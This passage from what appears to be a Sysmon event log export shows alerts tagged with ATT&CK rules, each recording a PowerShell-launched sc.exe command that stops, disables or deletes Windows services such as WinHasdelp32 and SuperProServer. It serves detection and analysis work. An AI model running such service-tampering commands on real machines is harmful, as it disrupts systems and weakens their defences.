Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:59.620 +ProcessGuid: {df9fc3d3-b3b3-5ecf-0000-0010aeba2600} +ProcessId: 5936 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop WinHasdelp32 +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop WinHasdelp32",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:59.624030900Z"",""eventRecordID"":""3027"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:59.620\r\nProcessGuid: {df9fc3d3-b3b3-5ecf-0000-0010aeba2600}\r\nProcessId: 5936\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop WinHasdelp32\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:59.620"",""processGuid"":""{df9fc3d3-b3b3-5ecf-0000-0010aeba2600}"",""processId"":""5936"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop WinHasdelp32"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:27.821",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:59.540 +ProcessGuid: {df9fc3d3-b3b3-5ecf-0000-0010d8b72600} +ProcessId: 6016 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop WinHasdadelp32 +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop WinHasdadelp32",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:59.544417000Z"",""eventRecordID"":""3024"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:59.540\r\nProcessGuid: {df9fc3d3-b3b3-5ecf-0000-0010d8b72600}\r\nProcessId: 6016\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop WinHasdadelp32\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:59.540"",""processGuid"":""{df9fc3d3-b3b3-5ecf-0000-0010d8b72600}"",""processId"":""6016"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop WinHasdadelp32"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:27.684",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:59.403 +ProcessGuid: {df9fc3d3-b3b3-5ecf-0000-0010dbb42600} +ProcessId: 8016 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop WissssssnHelp32 +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop WissssssnHelp32",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:59.409183100Z"",""eventRecordID"":""3021"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:59.403\r\nProcessGuid: {df9fc3d3-b3b3-5ecf-0000-0010dbb42600}\r\nProcessId: 8016\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop WissssssnHelp32\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:59.403"",""processGuid"":""{df9fc3d3-b3b3-5ecf-0000-0010dbb42600}"",""processId"":""8016"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop WissssssnHelp32"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:27.668",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:59.383 +ProcessGuid: {df9fc3d3-b3b3-5ecf-0000-0010a7b32600} +ProcessId: 7368 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Config WissssssnHelp32 Start= Disabled +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Config WissssssnHelp32 Start= Disabled",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:59.386781500Z"",""eventRecordID"":""3020"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:59.383\r\nProcessGuid: {df9fc3d3-b3b3-5ecf-0000-0010a7b32600}\r\nProcessId: 7368\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Config WissssssnHelp32 Start= Disabled\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:59.383"",""processGuid"":""{df9fc3d3-b3b3-5ecf-0000-0010a7b32600}"",""processId"":""7368"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Config WissssssnHelp32 Start= Disabled"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:27.644",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:59.345 +ProcessGuid: {df9fc3d3-b3b3-5ecf-0000-0010ceb12600} +ProcessId: 3828 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop "".Net CLR"" +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop \"".Net CLR\""",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:59.349125100Z"",""eventRecordID"":""3018"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:59.345\r\nProcessGuid: {df9fc3d3-b3b3-5ecf-0000-0010ceb12600}\r\nProcessId: 3828\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop \"".Net CLR\""\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:59.345"",""processGuid"":""{df9fc3d3-b3b3-5ecf-0000-0010ceb12600}"",""processId"":""3828"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop \\\"".Net CLR\\\"""",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:27.589",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:59.258 +ProcessGuid: {df9fc3d3-b3b3-5ecf-0000-0010c1ae2600} +ProcessId: 7944 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop SuperProServer +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop SuperProServer",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:59.260763500Z"",""eventRecordID"":""3015"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:59.258\r\nProcessGuid: {df9fc3d3-b3b3-5ecf-0000-0010c1ae2600}\r\nProcessId: 7944\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop SuperProServer\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:59.258"",""processGuid"":""{df9fc3d3-b3b3-5ecf-0000-0010c1ae2600}"",""processId"":""7944"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop SuperProServer"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:27.557",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:59.207 +ProcessGuid: {df9fc3d3-b3b3-5ecf-0000-00100dad2600} +ProcessId: 7360 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Delete Serhiez +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} 